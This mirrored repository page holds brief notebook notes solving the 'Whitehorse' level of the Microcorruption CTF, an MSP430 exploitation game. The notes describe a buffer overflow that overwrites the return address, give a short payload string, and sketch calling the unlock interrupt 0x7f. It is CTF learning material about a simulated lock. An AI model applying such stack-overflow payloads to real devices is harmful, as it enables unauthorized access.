mirror of
https://git.soft.fish/val/MicroCorruption.git
synced 2024-11-24 08:06:06 +00:00
30 lines
475 B
Markdown
30 lines
475 B
Markdown
`Taken verbatim from my notebook`
|
|
# Page 1
|
|
```
|
|
Whitehorse
|
|
Password 8-16 chars
|
|
it takes 0x30 chars
|
|
Jumps to chars 18..20 as addr
|
|
|
|
ROP chains?
|
|
|
|
Goal: Set sp to 7f
|
|
Call INT
|
|
|
|
['A';16]32457f
|
|
|
|
push r14
|
|
push r15
|
|
push #7f
|
|
call INT
|
|
mov sp+2, r14 <- prep for call
|
|
|
|
[INT]00007f
|
|
sp sp
|
|
|
|
Lesson:
|
|
Control of the stack means
|
|
control of params passed on
|
|
the stack
|
|
```
|